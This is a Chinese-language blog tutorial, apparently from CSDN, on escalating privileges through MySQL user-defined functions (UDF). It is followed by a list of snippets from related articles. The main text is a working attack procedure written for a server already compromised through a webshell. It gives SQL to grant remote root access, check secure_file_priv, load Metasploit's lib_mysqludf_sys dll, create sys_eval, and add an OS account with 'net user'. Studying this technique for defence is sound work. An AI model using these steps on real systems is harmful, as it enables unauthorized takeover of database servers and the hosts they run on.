MySQL提权之UDF

已于 2022-07-05 19:19:01 修改
阅读量1.3k 收藏 2
点赞数 3
分类专栏: 权限提升 文章标签: 网络安全 web安全 安全
于 2022-07-01 21:15:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44842234/article/details/125565386
版权

MySQL提权之UDF

1.什么是UDF

UDF(user defined function),即 “用户自定义函数”。是通过添加新函数,对MySQL的功能进行扩充,性质就像使用本地MYSQL函数如abs()或concat()

2.UDF提权思路

1.将udf文件放到指定位置(Mysql>5.1放在Mysql根目录的lib\plugin文件夹下)
2.从udf文件中引入自定义函数(user defined function)
3.执行自定义函数
注:udf 文件可以通过msf获取,msf内置了mysql udf提权的dll文件,linux的则为so文件。

3.UDF提权步骤

在实战中我们得到了服务器的webshell的权限后当通过其他方式提权失败后,可以考虑通过翻阅数据库配置文件、存储文件、暴力破解等方式获取数据库高权限账号密码为,MySQL UDF提取做准备。

3.1 MySQL提权条件:

1)获取到对方mysql的shell,或者是获取到mysql账号密码,能够调用mysql语句
2)对方mysql具有insert和delete权限,也就是可写可删除添加能够创建目录,写入文件验证是否可写(满足条件的基本上是root用户了)

3.2 执行步骤
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;
//通过蚁剑连上webshell后输入数据库的账号密码连上数据库,若数据库不支持外连则通过上述数据开启外连
注:root用户默认不支持外连,通过该语句开启数据外连

开启外连

show global variables like 'secure%';
可以通过数据库外连工具连接mysql,通过如下查询语句查询是否允许写入

查询是否允许写入

注:当secure_file_priv的值为NULL时,表示不对mysqld 的导入或导出做限制。
关于secure_file_priv 参数的具体说明可以参考:secure_file_priv参数说明

select version()    #查看数据库版本
//判断数据库版本主要是为了将udf.dll导入到哪个目录
//Mysql>5.1版本:udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下

请添加图片描述

select @@basedir    #查看数据库安装目录
//通过安装目录可以用webshell定位MySQL安装目录进而找到创建plugin目录

请添加图片描述

版本大于5.1 故新建plugin目录

请添加图片描述

可以通过msf的/usr/share/metasploit-framework/data/exploits/mysql目录获取已经写好的dll文件
注:dll或so为分为32位跟64位,且so用于linux中的udf提权,dll用于windows中的udf提权

请添加图片描述

复制32位的dll文件到plugin目录(测试环境为64位的windows,64位系统兼容32位的dll)

请添加图片描述

create function sys_eval returns string soname 'lib_mysqludf_sys_32.dll';
//创建sys_eval执行函数

请添加图片描述

select sys_eval ("net user  test 123,abc /add")
//执行命令

请添加图片描述

TheK403
关注
专栏目录
MySQL提权——udf提权
hackzkaq的博客
04-11 6483
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全学员——逍遥子 一、前期准备 1.Mysql udf简介 MySQL udf(user definedfunction,用户定义函数),为用户提供了一种高效创建函数的方式。udf函数按其运行模式可以分为单次调用型和聚集函数型两类,单次调用型函数能够针对数据库查询的每一行记录进行处理,聚集函数型用于处理Group By等聚集查询。 2.udf提权原理 udf的设计初衷是为了方便用户自定义一些函数,方便查询一些复杂的数据,同时也增加了使用udf提权的可能
MySQL UDF 提权
small_cat's home
10-22 1893
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
MysqlUDF提权
内心不种满鲜花就会长满杂草
11-07 1万+
udf提权通过在mysql中添加自定义函数来执行系统命令。效果是从 mysql权限 —> 系统权限。提权限制条件挺多,如下先获取mysql的权限(连接上了mysql数据库)Mysql版本大于5.1,我们需手动创建plugin文件夹,这是个棘手的问题mysql有写入文件的权限,即secure_file_priv的值为空。
MySQL UDF 提权初探
最新发布
GreatSQL2021的博客
08-07 346
''(empty string),不限制导入和导出的目录。只需将so写到plugin_dir,能创建so自定义函数。存在漏洞风险dirname(指定目录),限制导入和导出为指定目录。如果指定的目录和plugin_dir相同,能正常创建so自定义函数,存在漏洞风险;否则不能创建so自定义函数null,禁止导入和导出操作,不存在漏洞风险提权账号无论采用哪种方式启动数据库(systemctl start mysqlmysqld、mysqld_safe),提权后的账号根据mysqld进程uid确定。
mysql udf提权
weixin_60719780的博客
03-16 1425
udf提权只要是因为udf.dll文件,攻击者通过编写调用cmd或者shell的udf.dkk文件,并且导入到一个指定的文件夹目录下,创建一个指向udf.dll的自定义函数,从而在数据库中的查询就等价于在cmd或者shell中执行命令。查询下的MySQL版本,这里我的是5.7.26,是大于5.1版本的,也就是说,我们需要找到lib\plugin这个目录,然后将我们的udf.dll文件写进去,其实这里的目录需要我们自己创建。前面做的是为了做铺垫,后面我们提权需要使用这个16进制的udf.dll文件;
mysql提权udf
wo41ge的博客
12-14 676
UDF UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用。 它有3种返回值,这三种分别是 STRING 字符型 INTEGER 整型 REAL 实数型 提权的前提 mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下 mysql版本小于5.1, udf.dll文件在w
sqlmap mysql udf提权_MySQL数据库提权UDF
weixin_39683172的博客
01-30 508
UDFUDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。windows下udf提权的条件·如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/·如果mysql版本小于5.1...
mysql提权之MOF、UDF复现
qq_25768397的博客
08-25 918
今天复现了一下mysql提权,以往都没有尝试过,所以搭建环境尝试一下。 搭建环境: phpstudy win7企业版 DVWA上传点 以上步骤省略,跳到getshell后,使用哥斯拉进行提权。(假设所有条件满足,如不满足,尝试其他方法) 一、MOF提权 原理: 利用c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会有一个特定的时间去执行一次,那么把cmd命令添加到nullevt.mof中,cmd命令就会自动执行了。 注:mysql5.7 开始默认使
Mysql提权之反弹shell
热门推荐
weixin_43801718的博客
04-13 3万+
0x01 介绍 Mysql反弹shell提权,也是属于udf提权,只不过应用场景不同,例如没有得到webshell,但是获得了Mysql的root密码,恰好目标的数据库可以外连,那么就可以先将udf.dll文件的内容先插入到数据表中,然后再导出到’lib/plugin’ 0x02 适用场景 取较高权限的,比如获取webshell,或者获取到webshell无法执行高权限命令的。特别是有了SQL执行...
mysql udf
kid的博客
10-22 1294
mysql udf 最近用到了udf总结一下吧 UDF UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。通过动态库方式实现 UDF 编写 自己编写 ​ MySQL通过UDF实现扩展功能(Linux环境和Windows环境) G...
MYSQL提权UDF.dll
06-11
MYSQL提权 UDF.dll MYSQL提权 UDF.dll MYSQL提权 UDF.dll MYSQL提权 UDF.dll
mysql提权udf
09-20
mysql免杀UDF 提权必不可少神器。必须配备
mysql_udf提权
qq_42383069的博客
03-05 3285
0x00. 环境配置: 安装phpstudy,并且以系统服务模式启动 创建普通用户 在服务中将Apache以普通账户启动 赋予apache目录下logs普通账户写入权限 连接大马,测试下当前我们的权限 0x01. UDF介绍与使用: 什么是udfudf(Userdefined function)是用户自定义函数。在mysql中函数是什么?比如mysql中常见的sleep(),sum(),ascii()等都是函数。而udf就是为了让我们开发者能够自己写方便自己函数 为了在mysql中使用此
Mysql——udf提权
Zlirving_的博客
05-29 1268
udf提权 UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展,用户通过自定义函数来实现在MySQL中无法方便实现的功能,其添加的新函数都可以在SQL语句中调用 原理 UDF提权是利用MYSQL的自定义函数功能,构造特定得DLL将Mysql账号转化为系统system权限   利用条件 可利用于windows系统,linux系统 Windows文件是dll文件;linux里面的文件是
MySQL提权UDF提权
2301_76227305的博客
06-08 1412
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
linux提权——Mysql UDF提权
qq_55202378的博客
04-12 645
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
MySQL UDF
whitesock
04-30 153
    最近公司在做个SNS子项目,需要把交易系统中的交易数据实时地发送到SNS子系统中。最自然的设计是修改各个交易模块,将数据向SNS系统传输。但是在评审和开发的时候遇到了不小的阻力。理由很简单,这些修改直接影响系统的核心交易模块,引入了一定的风险。综合考虑后,决定增加个类似于Memcached Functions for MySQL的备选方案。SNS子系统虽然大量地使用了cache,但是没有使...
mysqludf提权
10-15
MySQLUDF(User-Defined Function)是用户自定义函数,可以在MySQL中创建自己的函数。但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意UDF库文件上传到目标系统。 3. 在MySQL中创建一个新的UDF函数,该函数将调用恶意UDF库文件中的代码。 4. 执行新创建的UDF函数,从而触发提权代码。 为了防止UDF提权攻击,可以采取以下措施: 1. 禁用MySQL中的UDF功能。 2. 限制MySQL用户的权限,只允许他们执行安全的操作。 3. 定期更新MySQL和操作系统的补丁,以修复已知的漏洞。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值